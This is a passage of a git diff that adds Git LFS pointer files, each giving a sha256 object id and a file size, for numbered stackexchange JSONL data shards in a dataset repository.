mode 100644 index 0000000000000000000000000000000000000000..366d9238a96fdb4881f59f0bbf4830098dd394d2 --- /dev/null +++ b/data/stackexchange/1-1/751_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:996f07551e326f082084ff0551fe949d7549b2abd27a2277734211dd0968310f +size 36123227 diff --git a/data/stackexchange/1-1/752_2289.jsonl b/data/stackexchange/1-1/752_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..68e665644ed523413600b241635f3e361d4ee910 --- /dev/null +++ b/data/stackexchange/1-1/752_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1fdafb71be60e3e62226ebe94189f3edc040ebae7e32942db9e422dd7b350bd7 +size 36210794 diff --git a/data/stackexchange/1-1/753_2289.jsonl b/data/stackexchange/1-1/753_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..9542b0c380ec5ce5fa0c08c7002ced5711690231 --- /dev/null +++ b/data/stackexchange/1-1/753_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7eb943ba28b8dcff0b123b6ac9d63325c6ff1295fdf23f897cd65deec06867b5 +size 36367656 diff --git a/data/stackexchange/1-1/754_2289.jsonl b/data/stackexchange/1-1/754_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3b8c34444ae751516ccc5f503307e2ac5e6c90df --- /dev/null +++ b/data/stackexchange/1-1/754_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2c26c43f8ec9716ada17b69bfeb086ab825f707c35483d0200b71b3a25795bc +size 36446176 diff --git a/data/stackexchange/1-1/755_2289.jsonl b/data/stackexchange/1-1/755_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d19dc0ff199bba159ab1b930aa7946057e7c7aeb --- /dev/null +++ b/data/stackexchange/1-1/755_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e625f0ae9de33f17450b02f1689b5ff61ef94f678ece6722b81efa27ebd2eb8 +size 35755169 diff --git a/data/stackexchange/1-1/756_2289.jsonl b/data/stackexchange/1-1/756_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3a50613008afddd49803a5548144b6971fe48b2 --- /dev/null +++ b/data/stackexchange/1-1/756_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b47b1c2accdcdc942f4bd101988b40cacf4bf49d6548535ef74ab0f7fc0b4c51 +size 35926219 diff --git a/data/stackexchange/1-1/757_2289.jsonl b/data/stackexchange/1-1/757_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..39de4690478f99b2981845d093c4581075c47257 --- /dev/null +++ b/data/stackexchange/1-1/757_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8429c064807210bf4c645270571cedb5b5f653891fb7e3e77941c50d7c9c30ed +size 35514977 diff --git a/data/stackexchange/1-1/758_2289.jsonl b/data/stackexchange/1-1/758_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5d3d42aea7f89880234f37da0ac4e1ec671e7ab7 --- /dev/null +++ b/data/stackexchange/1-1/758_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6dc541366b476eb54e25f5066365bb994ddcdfb0c9eb2ca705d926c0948f923 +size 35842374 diff --git a/data/stackexchange/1-1/759_2289.jsonl b/data/stackexchange/1-1/759_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b7d2eadf59892d5ec32c306172cd66831f892e24 --- /dev/null +++ b/data/stackexchange/1-1/759_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86c7ea1fc42deb826b737d2fc294a5510e8c2582e1a62cd223daab10fdaafa38 +size 35932653 diff --git a/data/stackexchange/1-1/75_2289.jsonl b/data/stackexchange/1-1/75_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..736ad71c7d940ec3703426efb08abe83327fa7ef --- /dev/null +++ b/data/stackexchange/1-1/75_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f91e8789cc49ddb4b9847be400457bf982c9f58e0b7e2f7117a19181bf90b1a +size 38948739 diff --git a/data/stackexchange/1-1/760_2289.jsonl b/data/stackexchange/1-1/760_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..40000c5bf659ae6045c64a85b459cc6912f64fb3 --- /dev/null +++ b/data/stackexchange/1-1/760_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:1f8bccb6b6f0b10b04cc27d85cc0590b83858321a91be29f5264b7400f5fa357 +size 36111929 diff --git a/data/stackexchange/1-1/761_2289.jsonl b/data/stackexchange/1-1/761_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..556d9f12b409d9a2d986ff46907090d3702720d6 --- /dev/null +++ b/data/stackexchange/1-1/761_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5c256cc1449798e9cf883963285f1f2c24923e18c905c6641c4083a16637413 +size 36311281 diff --git a/data/stackexchange/1-1/762_2289.jsonl b/data/stackexchange/1-1/762_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4141925e4ab71dd6bd230a6cec6f1bcc59b28e5a --- /dev/null +++ b/data/stackexchange/1-1/762_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fad4608ad5c1ad566872e078d4dbe7cf7959b51281cdb39b3b4c6b0d14704441 +size 36219843 diff --git a/data/stackexchange/1-1/763_2289.jsonl b/data/stackexchange/1-1/763_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b30e22c9156c41ce81ea71ec9ac04781b4423343 --- /dev/null +++ b/data/stackexchange/1-1/763_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1fb8930d6346dc6b5005d0b3bb32b3beb5ee7b332a6fce81f32409c9ab79c03 +size 35714846 diff --git a/data/stackexchange/1-1/764_2289.jsonl b/data/stackexchange/1-1/764_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb07f358f64e7be46966d3fd8e936265c2280692 --- /dev/null +++ b/data/stackexchange/1-1/764_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9e537bb657158be68aff44d2f7326e8068712232b3a3fb7f40a6c33c73b88d2 +size 36217965 diff --git a/data/stackexchange/1-1/765_2289.jsonl b/data/stackexchange/1-1/765_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..baca4427f6a0bf0a832f1ba7b84a1e3d4812b91f --- /dev/null +++ b/data/stackexchange/1-1/765_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76c997f377ffd861568fe16a9d6dc72740b959e077d14d4dddee28d73c3f4695 +size 35786475 diff --git a/data/stackexchange/1-1/766_2289.jsonl b/data/stackexchange/1-1/766_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f75db864d6c5615836962737074679fa8db055d9 --- /dev/null +++ b/data/stackexchange/1-1/766_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4304aaceff557a377d6d5edf3ee650d19084a365b74626695aa8e3ae166e1e93 +size 36226084 diff --git a/data/stackexchange/1-1/767_2289.jsonl b/data/stackexchange/1-1/767_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c944ad3cc5f404ff114d32774ae6ec7786804197 --- /dev/null +++ b/data/stackexchange/1-1/767_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0416ed4eefcbe85a8399e97eb7951d6903ce0e6358fa86f9999664ed77c84abf +size 35933173 diff --git a/data/stackexchange/1-1/768_2289.jsonl b/data/stackexchange/1-1/768_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..51891ff3beacc3d63c687144194ddac67641ee5a --- /dev/null +++ b/data/stackexchange/1-1/768_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46982d3cfb4029b559b8b56aab0cb7eae65eb545fd545c929e8a8ca4551f6551 +size 36406524 diff --git a/data/stackexchange/1-1/769_2289.jsonl b/data/stackexchange/1-1/769_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..46de77eb2ef0b96c87de7bdd59e3df70309f205f --- /dev/null +++ b/data/stackexchange/1-1/769_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a532b0d9361309cef4ae771b1b7139c745cb14ce7cb3b1c7b3be6fb479479080 +size 36560848 diff --git a/data/stackexchange/1-1/76_2289.jsonl b/data/stackexchange/1-1/76_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf35be9d22d8e40df586841bc5b311e76237fa4d --- /dev/null +++ b/data/stackexchange/1-1/76_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ae9421239f14d457e5ec38fe2db8bf17af5d91de5f37e2ef30eaea289b3d7fd +size 39486923 diff --git a/data/stackexchange/1-1/770_2289.jsonl b/data/stackexchange/1-1/770_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aacc928c69b8d8758bb57fe358ac65e528e11d43 --- /dev/null +++ b/data/stackexchange/1-1/770_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff51defbded98f8ab53129c34d72fcdf9e279884e8b5c77f941483943902fbe8 +size 36215344 diff --git a/data/stackexchange/1-1/771_2289.jsonl b/data/stackexchange/1-1/771_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a16aeae35a6fa24f2aa54435fe8dbac84aeae3ac --- /dev/null +++ b/data/stackexchange/1-1/771_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a881fa34a583d72e813aed3563216633c4ec2ed1f0ec5631580aabb89e80e1fd +size 36181404 diff --git a/data/stackexchange/1-1/772_2289.jsonl b/data/stackexchange/1-1/772_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..322df873fcb98393c9802b70f69c448c817ccfee --- /dev/null +++ b/data/stackexchange/1-1/772_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fcc413e8d06ebc5178c318fb961069f44a7920e2924eb8ff9214feb99efef14d +size 36294222 diff --git a/data/stackexchange/1-1/773_2289.jsonl b/data/stackexchange/1-1/773_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74421c76af17d41b34f3893133932610575694bc --- /dev/null +++ b/data/stackexchange/1-1/773_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be56a8cb78130c13f6917fcf14d5321d7864bff8aecd2ede45ba1401ab2c6bef +size 36291432 diff --git a/data/stackexchange/1-1/774_2289.jsonl b/data/stackexchange/1-1/774_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1747df2b9546443def5621ca3be2102a27d0f0e --- /dev/null +++ b/data/stackexchange/1-1/774_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:479d8350fc9e06fd5a3207012229dfaca4dc5efd820f9024ecdb93ee9e84f86e +size 35571053 diff --git a/data/stackexchange/1-1/775_2289.jsonl b/data/stackexchange/1-1/775_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7b03e7c1a460285b9e49c7cd491bc7e3551c386e --- /dev/null +++ b/data/stackexchange/1-1/775_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eeb7a544ae6da45711f4e5bdc207649d330518b42fcfbf1d517bdf1580ecb699 +size 36634225 diff --git a/data/stackexchange/1-1/776_2289.jsonl b/data/stackexchange/1-1/776_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0376a91cd7c5cee9f211dae15f63a559d3f4a69c --- /dev/null +++ b/data/stackexchange/1-1/776_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:85c20f585e391a1d87ae4c58226b8f608a9f53acf14c4a2a3299b78217733e63 +size 36337843 diff --git a/data/stackexchange/1-1/777_2289.jsonl b/data/stackexchange/1-1/777_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ef66ff71c3907c7dd9978298107eaef496619fb --- /dev/null +++ b/data/stackexchange/1-1/777_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:874380c9da9122471df36c6108a057b41984603e659406c919b7b1007ef6de3a +size 36230541 diff --git a/data/stackexchange/1-1/778_2289.jsonl b/data/stackexchange/1-1/778_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7b9aca00b0ba12e5733d77e5a14f7362edf28ead --- /dev/null +++ b/data/stackexchange/1-1/778_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:91e61ebdf8df549ad5a8e4b16907a8a8c35c8226bc17a91b766b412822810f64 +size 36518771 diff --git a/data/stackexchange/1-1/779_2289.jsonl b/data/stackexchange/1-1/779_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb162c3a7859a1624b648c05ecd0be75408c2aee --- /dev/null +++ b/data/stackexchange/1-1/779_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2911cacda57610add190b59874005daa2031aa7a1ef4d70029912047f08369ad +size 35764093 diff --git a/data/stackexchange/1-1/77_2289.jsonl b/data/stackexchange/1-1/77_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8fb53c3302094733f34997d1c80b975bec4a2648 --- /dev/null +++ b/data/stackexchange/1-1/77_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5f13d5d8898d3cd95972f473ece5ee855006ef4f75ecef8caceb21283680a285 +size 38885884 diff --git a/data/stackexchange/1-1/780_2289.jsonl b/data/stackexchange/1-1/780_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4bd46b7348ca584bdccba90c8f4571837915d2da --- /dev/null +++ b/data/stackexchange/1-1/780_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50bc4ed9bc39e081bc8074191146894c58de0475f0f533d661585d6223426a8d +size 36060938 diff --git a/data/stackexchange/1-1/781_2289.jsonl b/data/stackexchange/1-1/781_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..458148579324b4efdd6f4973fddf128b255ccca0 --- /dev/null +++ b/data/stackexchange/1-1/781_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:557f81d0a6729df1f6eb669ade74447826f62a27630f42b0c2fdd8c2c8c41f82 +size 36380015 diff --git a/data/stackexchange/1-1/782_2289.jsonl b/data/stackexchange/1-1/782_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1b87548b36da8417f2c369a5d8b84af55b54b663 --- /dev/null +++ b/data/stackexchange/1-1/782_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a87eb5708da50c4c7c87032fae3c2b9a0618e4f9790e7b46c609fef655ffa3b3 +size 36126033 diff --git a/data/stackexchange/1-1/783_2289.jsonl b/data/stackexchange/1-1/783_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..38980bb6f59b3605bc4f5a09fb7bd8128549b2f7 --- /dev/null +++ b/data/stackexchange/1-1/783_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ae1cb906674368f9e53733c6f631f3ab66a5bbe32b7000e13506abbd39fcb6e6 +size 35397781 diff --git a/data/stackexchange/1-1/784_2289.jsonl b/data/stackexchange/1-1/784_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..255b157b543473518851f54e47a6ddd42666e1c4 --- /dev/null +++ b/data/stackexchange/1-1/784_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c9faec1347a999d7e905721859f2ee7fb45cc1b8f4e5b3ee9c4aa509182ffe7 +size 36476689 diff --git a/data/stackexchange/1-1/785_2289.jsonl b/data/stackexchange/1-1/785_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad46695b3c42a15b10def919de3435e5aab54826 --- /dev/null +++ b/data/stackexchange/1-1/785_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:940ac75173f4e564d9454f067d183270e4a67cd2d82bfc899aec1869539d1179 +size 35497830 diff --git a/data/stackexchange/1-1/786_2289.jsonl b/data/stackexchange/1-1/786_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2a91fa35602d897f220a634695be83cc15cb1abe --- /dev/null +++ b/data/stackexchange/1-1/786_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:776ec99d4815acfaf5b759877e47cbc29571bae982c4db37a764f55a9e34cb6b +size 36318329 diff --git a/data/stackexchange/1-1/787_2289.jsonl b/data/stackexchange/1-1/787_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..11b66b88a0f0f173f0b27b06fc997340441fb698 --- /dev/null +++ b/data/stackexchange/1-1/787_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ef516686d7d01106bbb93f77498c60fcacbe0d1036aa0775769c261f611be7eb +size 36209990 diff --git a/data/stackexchange/1-1/788_2289.jsonl b/data/stackexchange/1-1/788_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4278da04356478761bfd32b5f5830a4b02865ab --- /dev/null +++ b/data/stackexchange/1-1/788_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:137a325c94b10ec2071076ec1fb7da8fbb423444f8aefd49356c7a4f824b3dce +size 36053184 diff --git a/data/stackexchange/1-1/789_2289.jsonl b/data/stackexchange/1-1/789_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7b7efa2bb445189041d5e7c21c77f9cde276df5c --- /dev/null +++ b/data/stackexchange/1-1/789_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:61df854adf910a042393371bc426e97b34ffab14917cdc0dc964c6aa739b54d0 +size 36652452 diff --git a/data/stackexchange/1-1/78_2289.jsonl b/data/stackexchange/1-1/78_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..14039fddbf8286a0cf17ebd3b5e141ca443e4a55 --- /dev/null +++ b/data/stackexchange/1-1/78_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1da0a8f1c44923e9acdb45801ccff759d3c74c27fe5b9f83f53ca6b8d5256348 +size 39690222 diff --git a/data/stackexchange/1-1/790_2289.jsonl b/data/stackexchange/1-1/790_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1dbaf7fd7f41296bc32d50a1dec7a3faefbc38ab --- /dev/null +++ b/data/stackexchange/1-1/790_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:54f91eba17b26afe11241e44a842e8e76a601577bff416e39f715251b2951eb4 +size 36436326 diff --git a/data/stackexchange/1-1/791_2289.jsonl b/data/stackexchange/1-1/791_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a2380db29290c25a170b3c132eb4706570747ca --- /dev/null +++ b/data/stackexchange/1-1/791_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:85dc1b0aa66f8b166806c915561619850e0c7c43bdc1198aee4fbd740eda76ef +size 35739129 diff --git a/data/stackexchange/1-1/792_2289.jsonl b/data/stackexchange/1-1/792_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32f03637bcbe693e2615afe0c776d1e29827b710 --- /dev/null +++ b/data/stackexchange/1-1/792_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:964b5c3dd609783adb47b5bad818bb3d286b6984d7c2dfc2393d26c9403f701a +size 36106951 diff --git a/data/stackexchange/1-1/793_2289.jsonl b/data/stackexchange/1-1/793_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bae7ed296bfe74a37b0fcd1e9a6cf92616a50770 --- /dev/null +++ b/data/stackexchange/1-1/793_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5389bdef47f75f19331620c82912eb28eafc49a9a6375ab80ce907be89ea69db +size 36116675 diff --git a/data/stackexchange/1-1/794_2289.jsonl b/data/stackexchange/1-1/794_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8dea5a0d0f97e6e84c781068747d1ce97a83fa69 --- /dev/null +++ b/data/stackexchange/1-1/794_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c18747a916a51c077c9fd8975d9d7a77ab7f14e8662998edede9b174c5e5205b +size 35952385 diff --git a/data/stackexchange/1-1/795_2289.jsonl b/data/stackexchange/1-1/795_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..545d632b1e55e031d2858eee609cc9f7e80c119d --- /dev/null +++ b/data/stackexchange/1-1/795_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f6c3a46f86c68221106b567007dc228fe0317ebe9befd54d8406facdb29ca97 +size 35968687 diff --git a/data/stackexchange/1-1/796_2289.jsonl b/data/stackexchange/1-1/796_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e02b5711e410cf484def1b8332932ee5d8334a4 --- /dev/null +++ b/data/stackexchange/1-1/796_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:04d0aeac567d9221f7ca394216d1a1aa94a007167b46e066dfcc561bdd137c7c +size 36139267 diff --git a/data/stackexchange/1-1/797_2289.jsonl b/data/stackexchange/1-1/797_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..08ac7482dd82cab04250a12157d984c1a9bdf863 --- /dev/null +++ b/data/stackexchange/1-1/797_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9dd5a615f4e601166e007d34d721d8aa86abb305cebdd28f043d70e28ca7d39 +size 35886254 diff --git a/data/stackexchange/1-1/798_2289.jsonl b/data/stackexchange/1-1/798_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..930f7a2d64c93752c9362b5627215af5704637c1 --- /dev/null +++ b/data/stackexchange/1-1/798_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4203e6cc316b9db69ffd18e5b3462676ad51c5d4184e8042d22e5d088fcf8161 +size 36587299 diff --git a/data/stackexchange/1-1/799_2289.jsonl b/data/stackexchange/1-1/799_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9c7b7219d1988d957ec5b8834b43243c2829ba82 --- /dev/null +++ b/data/stackexchange/1-1/799_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05e2d86cc3c95f75a60bc57865f9817f041084313a807c63cb9be485f842d54c +size 35924758 diff --git a/data/stackexchange/1-1/79_2289.jsonl b/data/stackexchange/1-1/79_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..8930869516a9027193382cda954db0567ac03a64 --- /dev/null +++ b/data/stackexchange/1-1/79_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13f6856df90b11a7a1dce7fc30efee178c23efb0e9d78eb1349badd66fe741cf +size 38889993 diff --git a/data/stackexchange/1-1/7_2289.jsonl b/data/stackexchange/1-1/7_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..218ca049e3d80848463b0b4fd67caf9d03141ed7 --- /dev/null +++ b/data/stackexchange/1-1/7_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94eeeb8a6d844a92d05935f22a0c5fc95388c932ec47a21680660b386b1759ef +size 35377362 diff --git a/data/stackexchange/1-1/800_2289.jsonl b/data/stackexchange/1-1/800_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fba57ef34f985bda91db3227b7b51b7a75c0804c --- /dev/null +++ b/data/stackexchange/1-1/800_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7284e4d283e5f4b5dffc38b7658cf06e95c49e9ac3d3facffd4a6e3d52240e7 +size 35445237 diff --git a/data/stackexchange/1-1/801_2289.jsonl b/data/stackexchange/1-1/801_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..732075cfce33447755af4dda9cd3620b1fa50c4a --- /dev/null +++ b/data/stackexchange/1-1/801_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c29b061cec24b0f32d16e14f7f06783e7ae466b47c807abba2bc37adec28c7ef +size 35310082 diff --git a/data/stackexchange/1-1/802_2289.jsonl b/data/stackexchange/1-1/802_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3b4fc433b461cb600a69a291a1d08a559da988c --- /dev/null +++ b/data/stackexchange/1-1/802_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ecb0a262d6b5a497e48d48e98ad52d0d17e156da987318e3412d195954d35641 +size 34970464 diff --git a/data/stackexchange/1-1/803_2289.jsonl b/data/stackexchange/1-1/803_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74bc175c69a4cc952c2cf9098dc3dac8f045943b --- /dev/null +++ b/data/stackexchange/1-1/803_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:888bc5fa89419e4955c7639684c04218eed4d25878c5225a01d616f97ab0706e +size 34723902 diff --git a/data/stackexchange/1-1/804_2289.jsonl b/data/stackexchange/1-1/804_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..52406835474183693f078ec37173f2b08074c847 --- /dev/null +++ b/data/stackexchange/1-1/804_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c1fedde0d483fc83bdfae91bb162ec1ff85a039786590de50aa1bef6beb5f3a0 +size 34889510 diff --git a/data/stackexchange/1-1/805_2289.jsonl b/data/stackexchange/1-1/805_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8431be74cebd437cc6b2fc6a057bc42f2437ad72 --- /dev/null +++ b/data/stackexchange/1-1/805_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:732139b60cbf0c314a45059afec9ae47bd6f40e4c9cbbeb95f40884b1d9f327e +size 35181076 diff --git a/data/stackexchange/1-1/806_2289.jsonl b/data/stackexchange/1-1/806_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd196416c6dce40ddf78dd28043837a4f4a6c4b4 --- /dev/null +++ b/data/stackexchange/1-1/806_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:ffdf399b5162a326ce530858b289933ec70ef163a47b278bf6818b43f3ed5a54 +size 35746839 diff --git a/data/stackexchange/1-1/807_2289.jsonl b/data/stackexchange/1-1/807_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d3c3ccdaa3f68772dd3981a397097ac7ea05d971 --- /dev/null +++ b/data/stackexchange/1-1/807_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80d7188525886f0229fb651e77f230fe0560a7a2ef67a475ac280d9badd7afba +size 34944674 diff --git a/data/stackexchange/1-1/808_2289.jsonl b/data/stackexchange/1-1/808_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0e9451886bb4ae5de7ebee08bf0144223f67862 --- /dev/null +++ b/data/stackexchange/1-1/808_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdbe1ad147ec72369da3757e94499904254f10209fe13bc96fa85e7cdd7d5cd0 +size 35070594 diff --git a/data/stackexchange/1-1/809_2289.jsonl b/data/stackexchange/1-1/809_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d8eac3566eb4f6e07350b2faa5b1c988b9d53d2f --- /dev/null +++ b/data/stackexchange/1-1/809_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93893ae6b275dcc30fbb86f714f1d7abf7aa275d3efb5f774451356c83f1c9eb +size 34757492 diff --git a/data/stackexchange/1-1/80_2289.jsonl b/data/stackexchange/1-1/80_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..002842afedcd9db97d9f8e9acdb6d8a413c6bc66 --- /dev/null +++ b/data/stackexchange/1-1/80_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6bd81ec16e520a58ff7dda58305c279ce9ef334ac719f42b62cd470d3cc3263b +size 39346501 diff --git a/data/stackexchange/1-1/810_2289.jsonl b/data/stackexchange/1-1/810_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a12f07519500641181549e2acd31ec4a0687e54e --- 